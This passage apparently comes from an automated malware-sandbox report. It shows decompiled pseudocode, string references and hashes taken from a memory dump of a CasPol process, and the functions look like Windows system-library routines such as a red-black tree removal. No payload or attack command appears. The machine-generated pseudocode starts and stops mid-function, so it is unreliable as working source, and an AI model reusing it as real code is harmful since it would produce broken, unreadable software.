                                                                					if(_t16 == 2) {
                                                                						goto L21;
                                                                					}
                                                                					if(_t16 != 4) {
                                                                						_t19 = 0xc00000f0;
                                                                						goto L7;
                                                                					}
                                                                					_t13 = 0;
                                                                					goto L6;
                                                                				} else {
                                                                					_t21 = 0x1f8;
                                                                					goto L5;
                                                                				}
                                                                			}












                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Actx
                                                                • API String ID: 0-89312691
                                                                • Opcode ID: bab9ce06ef083de20ac0758a40abd9d22f8255bf078593306cb71230a98e121b
                                                                • Instruction ID: 190b1df04301c10f37ba06850f02e9742c7c329a9ba5b3831fd8b246fb41ad67
                                                                • Opcode Fuzzy Hash: bab9ce06ef083de20ac0758a40abd9d22f8255bf078593306cb71230a98e121b
                                                                • Instruction Fuzzy Hash: 281104347487028BFB25CE1CAD9073676D9EB85224F2445BAE462CB791DB7CC8028740
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 71%
                                                                			E016D8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                				intOrPtr _t35;
                                                                				void* _t41;
                                                                
                                                                				_t40 = __esi;
                                                                				_t39 = __edi;
                                                                				_t38 = __edx;
                                                                				_t35 = __ecx;
                                                                				_t34 = __ebx;
                                                                				_push(0x74);
                                                                				_push(0x1700d50);
                                                                				E0167D0E8(__ebx, __edi, __esi);
                                                                				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                                				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                                				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                                					E016B5720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                                					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                                						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                						asm("int3");
                                                                						 *(_t41 - 4) = 0xfffffffe;
                                                                					}
                                                                				}
                                                                				 *(_t41 - 4) = 1;
                                                                				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                                				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                                				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                                				 *((intOrPtr*)(_t41 - 0x64)) = L0167DEF0;
                                                                				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                                				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                                				_push(_t41 - 0x70);
                                                                				L0167DEF0(1, _t38);
                                                                				 *(_t41 - 4) = 0xfffffffe;
                                                                				return E0167D130(_t34, _t39, _t40);
                                                                			}






                                                                Strings
                                                                • Critical error detected %lx, xrefs: 016D8E21
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Critical error detected %lx
                                                                • API String ID: 0-802127002
                                                                • Opcode ID: 06297f17eab8fb4b2e20805e4b51dcbc18297873025d27626a1969703cefe2e6
                                                                • Instruction ID: 49c0f31ad219901217edc380b24e1197ba61b7fd8974d2996b7a42dff53cdf64
                                                                • Opcode Fuzzy Hash: 06297f17eab8fb4b2e20805e4b51dcbc18297873025d27626a1969703cefe2e6
                                                                • Instruction Fuzzy Hash: 111157B1D14348DADF26DFA899097DDBBB5BF18315F24466EE529AB382C3344602CF18
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 016BFF60
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                • API String ID: 0-1911121157
                                                                • Opcode ID: fa602748c219903b96acfdcd814288341d28a17e3a6cbf4f5266f47a0ed2627f
                                                                • Instruction ID: 5bebac89330d510be6c2a42414c5d46adbf8e219a0c6d5b28c971471fdbff483
                                                                • Opcode Fuzzy Hash: fa602748c219903b96acfdcd814288341d28a17e3a6cbf4f5266f47a0ed2627f
                                                                • Instruction Fuzzy Hash: 2911C071910244EFDF26EF98CD89FD8BBB2FF09715F148498E5096B2A1C7399980DB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 99%
                                                                			E0162F900(signed int _a4, signed int _a8) {
                                                                				signed char _v5;
                                                                				signed char _v6;
                                                                				signed int _v12;
                                                                				signed int _v16;
                                                                				signed int _v20;
                                                                				signed int _v24;
                                                                				signed int _v28;
                                                                				signed int _v32;
                                                                				signed char _t285;
                                                                				signed int _t289;
                                                                				signed char _t292;
                                                                				signed int _t293;
                                                                				signed char _t295;
                                                                				signed int _t300;
                                                                				signed int _t301;
                                                                				signed char _t306;
                                                                				signed char _t307;
                                                                				signed char _t308;
                                                                				signed int _t310;
                                                                				signed int _t311;
                                                                				signed int _t312;
                                                                				signed char _t314;
                                                                				signed int _t316;
                                                                				signed int _t318;
                                                                				signed int _t319;
                                                                				signed int _t320;
                                                                				signed int _t322;
                                                                				signed int _t323;
                                                                				signed int _t328;
                                                                				signed char _t329;
                                                                				signed int _t337;
                                                                				signed int _t339;
                                                                				signed int _t343;
                                                                				signed int _t345;
                                                                				signed int _t348;
                                                                				signed char _t350;
                                                                				signed int _t351;
                                                                				signed char _t353;
                                                                				signed char _t356;
                                                                				signed int _t357;
                                                                				signed char _t359;
                                                                				signed int _t360;
                                                                				signed char _t363;
                                                                				signed int _t364;
                                                                				signed int _t366;
                                                                				signed int* _t372;
                                                                				signed char _t373;
                                                                				signed char _t378;
                                                                				signed int _t379;
                                                                				signed int* _t382;
                                                                				signed int _t383;
                                                                				signed char _t385;
                                                                				signed int _t387;
                                                                				signed int _t388;
                                                                				signed char _t390;
                                                                				signed int _t393;
                                                                				signed int _t395;
                                                                				signed char _t397;
                                                                				signed int _t401;
                                                                				signed int _t405;
                                                                				signed int _t407;
                                                                				signed int _t409;
                                                                				signed int _t410;
                                                                				signed int _t413;
                                                                				signed char _t415;
                                                                				signed int _t416;
                                                                				signed char _t418;
                                                                				signed int _t419;
                                                                				signed int _t421;
                                                                				signed int _t422;
                                                                				signed int _t423;
                                                                				signed char* _t425;
                                                                				signed char _t426;
                                                                				signed char _t427;
                                                                				signed int _t428;
                                                                				signed int _t429;
                                                                				signed int _t431;
                                                                				signed int _t432;
                                                                				signed int _t434;
                                                                				signed int _t436;
                                                                				signed int _t444;
                                                                				signed int _t445;
                                                                				signed int _t446;
                                                                				signed int _t452;
                                                                				signed int _t454;
                                                                				signed int _t455;
                                                                				signed int _t456;
                                                                				signed int _t457;
                                                                				signed int _t461;
                                                                				signed int _t462;
                                                                				signed int _t464;
                                                                				signed int _t467;
                                                                				signed int _t470;
                                                                				signed int _t474;
                                                                				signed int _t475;
                                                                				signed int _t477;
                                                                				signed int _t481;
                                                                				signed int _t483;
                                                                				signed int _t486;
                                                                				signed int _t487;
                                                                				signed int _t488;
                                                                
                                                                				_t285 =  *(_a4 + 4);
                                                                				_t444 = _a8;
                                                                				_t452 =  *_t444;
                                                                				_t421 = _t285 & 1;
                                                                				if(_t421 != 0) {
                                                                					if(_t452 != 0) {
                                                                						_t452 = _t452 ^ _t444;
                                                                					}
                                                                				}
                                                                				_t393 =  *(_t444 + 4);
                                                                				if(_t421 != 0) {
                                                                					if(_t393 != 0) {
                                                                						_t393 = _t393 ^ _t444;
                                                                					}
                                                                				}
                                                                				_t426 = _t393;
                                                                				if(_t452 != 0) {
                                                                					_t426 = _t452;
                                                                				}
                                                                				_v5 = _t285 & 0x00000001;
                                                                				asm("sbb eax, eax");
                                                                				if((_t393 &  ~_t452) != 0) {
                                                                					_t289 = _t393;
                                                                					_t427 = _v5;
                                                                					_t422 = _t393;
                                                                					_v12 = _t393;
                                                                					_v16 = 1;
                                                                					if( *_t393 != 0) {
                                                                						_v16 = _v16 & 0x00000000;
                                                                						_t445 =  *_t393;
                                                                						goto L115;
                                                                						L116:
                                                                						_t289 = _t445;
                                                                						L117:
                                                                						_t445 =  *_t289;
                                                                						if(_t445 != 0) {
                                                                							L115:
                                                                							_t422 = _t289;
                                                                							if(_t427 != 0) {
                                                                								goto L183;
                                                                							}
                                                                							goto L116;
                                                                						} else {
                                                                							_t444 = _a8;
                                                                							_v12 = _t289;
                                                                							goto L27;
                                                                						}
                                                                						L183:
                                                                						if(_t445 == 0) {
                                                                							goto L116;
                                                                						}
                                                                						_t289 = _t289 ^ _t445;
                                                                						goto L117;
                                                                					}
                                                                					L27:
                                                                					if(_t427 != 0) {
                                                                						if(_t452 == 0) {
                                                                							goto L28;
                                                                						}
                                                                						_t428 = _t289 ^ _t452;
                                                                						L29:
                                                                						 *_t289 = _t428;
                                                                						_t429 =  *(_t452 + 8);
                                                                						_v20 = _t429;
                                                                						_t426 = _t429 & 0xfffffffc;
                                                                						_t292 =  *(_a4 + 4) & 0x00000001;
                                                                						_v6 = _t292;
                                                                						_t293 = _v12;
                                                                						if(_t292 != 0) {
                                                                							if(_t426 != 0) {
                                                                								_t426 = _t426 ^ _t452;
                                                                							}
                                                                						}
                                                                						if(_t426 != _t444) {
                                                                							L174:
                                                                							_t423 = 0x1d;
                                                                							asm("int 0x29");
                                                                							goto L175;
                                                                						} else {
                                                                							_t436 = _t293;
                                                                							if(_v6 != 0) {
                                                                								_t436 = _t436 ^ _t452;
                                                                							}
                                                                							_v20 = _v20 & 0x00000003;
                                                                							_v20 = _v20 | _t436;
                                                                							 *(_t452 + 8) = _v20;
                                                                							_t426 =  *(_t393 + 8) & 0xfffffffc;
                                                                							_t356 =  *(_a4 + 4) & 0x00000001;
                                                                							_v6 = _t356;
                                                                							_t357 = _v12;
                                                                							if(_t356 != 0) {
                                                                								if(_t426 != 0) {
                                                                									_t426 = _t426 ^ _t393;
                                                                								}
                                                                							}
                                                                							if(_t426 != _t444) {
                                                                								goto L174;
                                                                							} else {
                                                                								_t483 = _t393 ^ _t357;
                                                                								_v24 = _t483;
                                                                								if(_v6 == 0) {
                                                                									_v24 = _t357;
                                                                								}
                                                                								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
                                                                								_t426 =  *(_t357 + 4);
                                                                								_t444 = _a8;
                                                                								_t359 =  *(_a4 + 4) & 0x00000001;
                                                                								_v6 = _t359;
                                                                								_t360 = _v12;
                                                                								_v24 = _t483;
                                                                								if(_t359 != 0) {
                                                                									_v24 = _t483;
                                                                									if(_t426 == 0) {
                                                                										goto L37;
                                                                									}
                                                                									_t426 = _t426 ^ _t360;
                                                                									L38:
                                                                									if(_v6 == 0) {
                                                                										_t483 = _t393;
                                                                									}
                                                                									_t413 =  *(_t360 + 8);
                                                                									 *(_t360 + 4) = _t483;
                                                                									_t452 = _t413 & 0xfffffffc;
                                                                									_v5 = _t413;
                                                                									_t363 =  *(_a4 + 4) & 0x00000001;
                                                                									_v6 = _t363;
                                                                									if(_t363 != 0) {
                                                                										_t364 = _v12;
                                                                										_v5 = _t413;
                                                                										if(_t452 == 0) {
                                                                											goto L41;
                                                                										}
                                                                										_v20 = _t452;
                                                                										_v20 = _v20 ^ _t364;
                                                                										L42:
                                                                										if(_v20 != _t422) {
                                                                											_v5 = _t413;
                                                                											if(_v6 == 0) {
                                                                												L199:
                                                                												_t366 = _v12;
                                                                												L200:
                                                                												if(_t452 != 0 || _t366 != _t422) {
                                                                													goto L174;
                                                                												} else {
                                                                													goto L43;
                                                                												}
                                                                											}
                                                                											_t366 = _v12;
                                                                											_v5 = _t413;
                                                                											if(_t452 == 0) {
                                                                												goto L199;
                                                                											}
                                                                											_t452 = _t452 ^ _t366;
                                                                											goto L200;
                                                                										}
                                                                										L43:
                                                                										_t486 =  *(_t444 + 8) & 0xfffffffc;
                                                                										if(_v6 != 0) {
                                                                											if(_t486 != 0) {
                                                                												_t486 = _t486 ^ _t444;
                                                                											}
                                                                											if(_v6 != 0 && _t486 != 0) {
                                                                												_t486 = _t486 ^ _t366;
                                                                											}
                                                                										}
                                                                										_t415 = _t413 & 0x00000003 | _t486;
                                                                										 *(_t366 + 8) = _t415;
                                                                										_t416 = _v12;
                                                                										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
                                                                										_t452 =  *(_t444 + 8);
                                                                										_t372 = _a4;
                                                                										if((_t452 & 0xfffffffc) == 0) {
                                                                											if( *_t372 != _t444) {
                                                                												goto L174;
                                                                											} else {
                                                                												 *_t372 = _t416;
                                                                												goto L52;
                                                                											}
                                                                										} else {
                                                                											_t452 = _t452 & 0xfffffffc;
                                                                											_t378 = _t372[1] & 0x00000001;
                                                                											_v6 = _t378;
                                                                											if(_t378 != 0) {
                                                                												if(_t452 != 0) {
                                                                													_t452 = _t452 ^ _t444;
                                                                												}
                                                                											}
                                                                											_t379 =  *(_t452 + 4);
                                                                											if(_v6 != 0) {
                                                                												if(_t379 != 0) {
                                                                													_t379 = _t379 ^ _t452;
                                                                												}
                                                                											}
                                                                											_v24 = _t379;
                                                                											_t382 = _t452 + (0 | _v24 == _t444) * 4;
                                                                											_v28 = _t382;
                                                                											_t383 =  *_t382;
                                                                											if(_v6 != 0) {
                                                                												if(_t383 != 0) {
                                                                													_t383 = _t383 ^ _t452;
                                                                												}
                                                                											}
                                                                											if(_t383 != _t444) {
                                                                												goto L174;
                                                                											} else {
                                                                												if(_v6 != 0) {
                                                                													_t487 = _t452 ^ _t416;
                                                                												} else {
                                                                													_t487 = _t416;
                                                                												}
                                                                												 *_v28 = _t487;
                                                                												L52:
                                                                												_t373 = _v5;
                                                                												L12:
                                                                												_t452 = _a4;
                                                                												_v5 = _t373 & 0x00000001;
                                                                												if(( *(_t452 + 4) & 0x00000001) != 0) {
                                                                													if(_t426 == 0) {
                                                                														goto L13;
                                                                													}
                                                                													_t306 = _t422 ^ _t426;
                                                                													L14:
                                                                													_t444 = _v16;
                                                                													 *(_t422 + _t444 * 4) = _t306;
                                                                													if(_t426 != 0) {
                                                                														_t306 =  *(_t426 + 8) & 0xfffffffc;
                                                                														_t418 =  *(_t452 + 4) & 0x00000001;
                                                                														_v6 = _t418;
                                                                														_t419 = _v12;
                                                                														if(_t418 != 0) {
                                                                															if(_t306 != 0) {
                                                                																_t306 = _t306 ^ _t426;
                                                                															}
                                                                														}
                                                                														if(_t306 != _t419) {
                                                                															goto L174;
                                                                														} else {
                                                                															if(_v6 != 0) {
                                                                																if(_t422 != 0) {
                                                                																	_t422 = _t422 ^ _t426;
                                                                																}
                                                                															}
                                                                															 *(_t426 + 8) = _t422;
                                                                															L24:
                                                                															return _t306;
                                                                														}
                                                                													}
                                                                													if(_v5 != _t426) {
                                                                														goto L24;
                                                                													} else {
                                                                														_t395 = _t452;
                                                                														_t306 =  *(_t395 + 4);
                                                                														L17:
                                                                														_t446 = _t423;
                                                                														_t434 = _v16 ^ 0x00000001;
                                                                														_v24 = _t446;
                                                                														_v12 = _t434;
                                                                														_t452 =  *(_t423 + _t434 * 4);
                                                                														if((_t306 & 0x00000001) != 0) {
                                                                															if(_t452 == 0) {
                                                                																goto L18;
                                                                															}
                                                                															_t426 = _t452 ^ _t446;
                                                                															L19:
                                                                															if(( *(_t426 + 8) & 0x00000001) != 0) {
                                                                																_t310 =  *(_t426 + 8) & 0xfffffffc;
                                                                																_t444 = _t306 & 1;
                                                                																if(_t444 != 0) {
                                                                																	if(_t310 != 0) {
                                                                																		_t310 = _t310 ^ _t426;
                                                                																	}
                                                                																}
                                                                																if(_t310 != _t423) {
                                                                																	goto L174;
                                                                																} else {
                                                                																	if(_t444 != 0) {
                                                                																		if(_t452 != 0) {
                                                                																			_t452 = _t452 ^ _t423;
                                                                																		}
                                                                																	}
                                                                																	if(_t452 != _t426) {
                                                                																		goto L174;
                                                                																	} else {
                                                                																		_t452 =  *(_t423 + 8) & 0xfffffffc;
                                                                																		if(_t444 != 0) {
                                                                																			if(_t452 == 0) {
                                                                																				L170:
                                                                																				if( *_t395 != _t423) {
                                                                																					goto L174;
                                                                																				} else {
                                                                																					 *_t395 = _t426;
                                                                																					L140:
                                                                																					if(_t444 != 0) {
                                                                																						if(_t452 != 0) {
                                                                																							_t452 = _t452 ^ _t426;
                                                                																						}
                                                                																					}
                                                                																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
                                                                																					_t300 =  *(_t426 + _v16 * 4);
                                                                																					if(_t444 != 0) {
                                                                																						if(_t300 == 0) {
                                                                																							goto L143;
                                                                																						}
                                                                																						_t300 = _t300 ^ _t426;
                                                                																						goto L142;
                                                                																					} else {
                                                                																						L142:
                                                                																						if(_t300 != 0) {
                                                                																							_t401 =  *(_t300 + 8);
                                                                																							_t452 = _t401 & 0xfffffffc;
                                                                																							if(_t444 != 0) {
                                                                																								if(_t452 != 0) {
                                                                																									_t452 = _t452 ^ _t300;
                                                                																								}
                                                                																							}
                                                                																							if(_t452 != _t426) {
                                                                																								goto L174;
                                                                																							} else {
                                                                																								if(_t444 != 0) {
                                                                																									_t481 = _t300 ^ _t423;
                                                                																								} else {
                                                                																									_t481 = _t423;
                                                                																								}
                                                                																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
                                                                																								goto L143;
                                                                																							}
                                                                																						}
                                                                																						L143:
                                                                																						if(_t444 != 0) {
                                                                																							if(_t300 != 0) {
                                                                																								_t300 = _t300 ^ _t423;
                                                                																							}
                                                                																						}
                                                                																						 *(_t423 + _v12 * 4) = _t300;
                                                                																						_t454 = _t426;
                                                                																						if(_t444 != 0) {
                                                                																							_t455 = _t454 ^ _t423;
                                                                																							_t301 = _t455;
                                                                																						} else {
                                                                																							_t301 = _t423;
                                                                																							_t455 = _t454 ^ _t301;
                                                                																						}
                                                                																						 *(_t426 + _v16 * 4) = _t301;
                                                                																						_t395 = _a4;
                                                                																						if(_t444 == 0) {
                                                                																							_t455 = _t426;
                                                                																						}
                                                                																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
                                                                																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
                                                                																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
                                                                																						_t426 =  *(_t423 + _v12 * 4);
                                                                																						_t306 =  *(_t395 + 4);
                                                                																						if((_t306 & 0x00000001) != 0) {
                                                                																							if(_t426 != 0) {
                                                                																								_t426 = _t426 ^ _t423;
                                                                																							}
                                                                																						}
                                                                																						_t446 = _v24;
                                                                																						goto L20;
                                                                																					}
                                                                																				}
                                                                																			}
                                                                																			_t452 = _t452 ^ _t423;
                                                                																		}
                                                                																		if(_t452 == 0) {
                                                                																			goto L170;
                                                                																		}
                                                                																		_t311 =  *(_t452 + 4);
                                                                																		if(_t444 != 0) {
                                                                																			if(_t311 != 0) {
                                                                																				_t311 = _t311 ^ _t452;
                                                                																			}
                                                                																		}
                                                                																		if(_t311 == _t423) {
                                                                																			if(_t444 != 0) {
                                                                																				L175:
                                                                																				_t295 = _t452 ^ _t426;
                                                                																				goto L169;
                                                                																			} else {
                                                                																				_t295 = _t426;
                                                                																				L169:
                                                                																				 *(_t452 + 4) = _t295;
                                                                																				goto L140;
                                                                																			}
                                                                																		} else {
                                                                																			_t312 =  *_t452;
                                                                																			if(_t444 != 0) {
                                                                																				if(_t312 != 0) {
                                                                																					_t312 = _t312 ^ _t452;
                                                                																				}
                                                                																			}
                                                                																			if(_t312 != _t423) {
                                                                																				goto L174;
                                                                																			} else {
                                                                																				if(_t444 != 0) {
                                                                																					_t314 = _t452 ^ _t426;
                                                                																				} else {
                                                                																					_t314 = _t426;
                                                                																				}
                                                                																				 *_t452 = _t314;
                                                                																				goto L140;
                                                                																			}
                                                                																		}
                                                                																	}
                                                                																}
                                                                															}
                                                                															L20:
                                                                															_t456 =  *_t426;
                                                                															_t307 = _t306 & 0x00000001;
                                                                															if(_t456 != 0) {
                                                                																if(_t307 != 0) {
                                                                																	_t456 = _t456 ^ _t426;
                                                                																}
                                                                																if(( *(_t456 + 8) & 0x00000001) == 0) {
                                                                																	goto L21;
                                                                																} else {
                                                                																	L56:
                                                                																	_t461 =  *(_t426 + _v12 * 4);
                                                                																	if(_t307 != 0) {
                                                                																		if(_t461 == 0) {
                                                                																			L59:
                                                                																			_t462 = _v16;
                                                                																			_t444 =  *(_t426 + _t462 * 4);
                                                                																			if(_t307 != 0) {
                                                                																				if(_t444 != 0) {
                                                                																					_t444 = _t444 ^ _t426;
                                                                																				}
                                                                																			}
                                                                																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
                                                                																			_t452 = _t462 ^ 0x00000001;
                                                                																			_t405 =  *(_t395 + 4) & 1;
                                                                																			_t316 =  *(_t444 + 8) & 0xfffffffc;
                                                                																			_v28 = _t405;
                                                                																			_v24 = _t452;
                                                                																			if(_t405 != 0) {
                                                                																				if(_t316 != 0) {
                                                                																					_t316 = _t316 ^ _t444;
                                                                																				}
                                                                																			}
                                                                																			if(_t316 != _t426) {
                                                                																				goto L174;
                                                                																			} else {
                                                                																				_t318 = _t452 ^ 0x00000001;
                                                                																				_v32 = _t318;
                                                                																				_t319 =  *(_t426 + _t318 * 4);
                                                                																				if(_t405 != 0) {
                                                                																					if(_t319 != 0) {
                                                                																						_t319 = _t319 ^ _t426;
                                                                																					}
                                                                																				}
                                                                																				if(_t319 != _t444) {
                                                                																					goto L174;
                                                                																				} else {
                                                                																					_t320 =  *(_t423 + _t452 * 4);
                                                                																					if(_t405 != 0) {
                                                                																						if(_t320 != 0) {
                                                                																							_t320 = _t320 ^ _t423;
                                                                																						}
                                                                																					}
                                                                																					if(_t320 != _t426) {
                                                                																						goto L174;
                                                                																					} else {
                                                                																						_t322 =  *(_t426 + 8) & 0xfffffffc;
                                                                																						if(_t405 != 0) {
                                                                																							if(_t322 != 0) {
                                                                																								_t322 = _t322 ^ _t426;
                                                                																							}
                                                                																						}
                                                                																						if(_t322 != _t423) {
                                                                																							goto L174;
                                                                																						} else {
                                                                																							_t464 = _t423 ^ _t444;
                                                                																							_t323 = _t464;
                                                                																							if(_t405 == 0) {
                                                                																								_t323 = _t444;
                                                                																							}
                                                                																							 *(_t423 + _v24 * 4) = _t323;
                                                                																							_t407 = _v28;
                                                                																							if(_t407 != 0) {
                                                                																								if(_t423 != 0) {
                                                                																									L72:
                                                                																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
                                                                																									_t328 =  *(_t444 + _v24 * 4);
                                                                																									if(_t407 != 0) {
                                                                																										if(_t328 == 0) {
                                                                																											L74:
                                                                																											if(_t407 != 0) {
                                                                																												if(_t328 != 0) {
                                                                																													_t328 = _t328 ^ _t426;
                                                                																												}
                                                                																											}
                                                                																											 *(_t426 + _v32 * 4) = _t328;
                                                                																											_t467 = _t426 ^ _t444;
                                                                																											_t329 = _t467;
                                                                																											if(_t407 == 0) {
                                                                																												_t329 = _t426;
                                                                																											}
                                                                																											 *(_t444 + _v24 * 4) = _t329;
                                                                																											if(_v28 == 0) {
                                                                																												_t467 = _t444;
                                                                																											}
                                                                																											_t395 = _a4;
                                                                																											_t452 = _t426;
                                                                																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
                                                                																											_t426 = _t444;
                                                                																											L80:
                                                                																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
                                                                																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
                                                                																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
                                                                																											_t337 =  *(_t426 + 8) & 0xfffffffc;
                                                                																											_t444 =  *(_t395 + 4) & 1;
                                                                																											if(_t444 != 0) {
                                                                																												if(_t337 != 0) {
                                                                																													_t337 = _t337 ^ _t426;
                                                                																												}
                                                                																											}
                                                                																											if(_t337 != _t423) {
                                                                																												goto L174;
                                                                																											} else {
                                                                																												_t339 =  *(_t423 + _v12 * 4);
                                                                																												if(_t444 != 0) {
                                                                																													if(_t339 != 0) {
                                                                																														_t339 = _t339 ^ _t423;
                                                                																													}
                                                                																												}
                                                                																												if(_t339 != _t426) {
                                                                																													goto L174;
                                                                																												} else {
                                                                																													_t452 =  *(_t423 + 8) & 0xfffffffc;
                                                                																													if(_t444 != 0) {
                                                                																														if(_t452 == 0) {
                                                                																															L160:
                                                                																															if( *_t395 != _t423) {
                                                                																																goto L174;
                                                                																															} else {
                                                                																																 *_t395 = _t426;
                                                                																																L93:
                                                                																																if(_t444 != 0) {
                                                                																																	if(_t452 != 0) {
                                                                																																		_t452 = _t452 ^ _t426;
                                                                																																	}
                                                                																																}
                                                                																																_t409 = _v16;
                                                                																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
                                                                																																_t343 =  *(_t426 + _t409 * 4);
                                                                																																if(_t444 != 0) {
                                                                																																	if(_t343 == 0) {
                                                                																																		goto L96;
                                                                																																	}
                                                                																																	_t343 = _t343 ^ _t426;
                                                                																																	goto L95;
                                                                																																} else {
                                                                																																	L95:
                                                                																																	if(_t343 != 0) {
                                                                																																		_t410 =  *(_t343 + 8);
                                                                																																		_t452 = _t410 & 0xfffffffc;
                                                                																																		if(_t444 != 0) {
                                                                																																			if(_t452 != 0) {
                                                                																																				_t452 = _t452 ^ _t343;
                                                                																																			}
                                                                																																		}
                                                                																																		if(_t452 != _t426) {
                                                                																																			goto L174;
                                                                																																		} else {
                                                                																																			if(_t444 != 0) {
                                                                																																				_t474 = _t343 ^ _t423;
                                                                																																			} else {
                                                                																																				_t474 = _t423;
                                                                																																			}
                                                                																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
                                                                																																			_t409 = _v16;
                                                                																																			goto L96;
                                                                																																		}
                                                                																																	}
                                                                																																	L96:
                                                                																																	if(_t444 != 0) {
                                                                																																		if(_t343 != 0) {
                                                                																																			_t343 = _t343 ^ _t423;
                                                                																																		}
                                                                																																	}
                                                                																																	 *(_t423 + _v12 * 4) = _t343;
                                                                																																	if(_t444 != 0) {
                                                                																																		_t345 = _t426 ^ _t423;
                                                                																																		_t470 = _t345;
                                                                																																	} else {
                                                                																																		_t345 = _t423;
                                                                																																		_t470 = _t426 ^ _t345;
                                                                																																	}
                                                                																																	 *(_t426 + _t409 * 4) = _t345;
                                                                																																	if(_t444 == 0) {
                                                                																																		_t470 = _t426;
                                                                																																	}
                                                                																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
                                                                																																	 *(_t423 + 8) = _t306;
                                                                																																	goto L24;
                                                                																																}
                                                                																															}
                                                                																														}
                                                                																														_t452 = _t452 ^ _t423;
                                                                																													}
                                                                																													if(_t452 == 0) {
                                                                																														goto L160;
                                                                																													}
                                                                																													_t348 =  *(_t452 + 4);
                                                                																													if(_t444 != 0) {
                                                                																														if(_t348 != 0) {
                                                                																															_t348 = _t348 ^ _t452;
                                                                																														}
                                                                																													}
                                                                																													if(_t348 == _t423) {
                                                                																														if(_t444 != 0) {
                                                                																															_t350 = _t452 ^ _t426;
                                                                																														} else {
                                                                																															_t350 = _t426;
                                                                																														}
                                                                																														 *(_t452 + 4) = _t350;
                                                                																														goto L93;
                                                                																													} else {
                                                                																														_t351 =  *_t452;
                                                                																														if(_t444 != 0) {
                                                                																															if(_t351 != 0) {
                                                                																																_t351 = _t351 ^ _t452;
                                                                																															}
                                                                																														}
                                                                																														if(_t351 != _t423) {
                                                                																															goto L174;
                                                                																														} else {
                                                                																															if(_t444 != 0) {
                                                                																																_t353 = _t452 ^ _t426;
                                                                																															} else {
                                                                																																_t353 = _t426;
                                                                																															}
                                                                																															 *_t452 = _t353;
                                                                																															goto L93;
                                                                																														}
                                                                																													}
                                                                																												}
                                                                																											}
                                                                																										}
                                                                																										_t328 = _t328 ^ _t444;
                                                                																									}
                                                                																									if(_t328 != 0) {
                                                                																										_t475 =  *(_t328 + 8);
                                                                																										_v20 = _t475;
                                                                																										_t452 = _t475 & 0xfffffffc;
                                                                																										if(_t407 != 0) {
                                                                																											if(_t452 != 0) {
                                                                																												_t452 = _t452 ^ _t328;
                                                                																											}
                                                                																										}
                                                                																										if(_t452 != _t444) {
                                                                																											goto L174;
                                                                																										} else {
                                                                																											if(_t407 != 0) {
                                                                																												_t477 = _t328 ^ _t426;
                                                                																											} else {
                                                                																												_t477 = _t426;
                                                                																											}
                                                                																											_v20 = _v20 & 0x00000003;
                                                                																											_v20 = _v20 | _t477;
                                                                																											 *(_t328 + 8) = _v20;
                                                                																											goto L74;
                                                                																										}
                                                                																									}
                                                                																									goto L74;
                                                                																								}
                                                                																							}
                                                                																							_t464 = _t423;
                                                                																							goto L72;
                                                                																						}
                                                                																					}
                                                                																				}
                                                                																			}
                                                                																		}
                                                                																		_t452 = _t461 ^ _t426;
                                                                																	}
                                                                																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
                                                                																		goto L59;
                                                                																	} else {
                                                                																		goto L80;
                                                                																	}
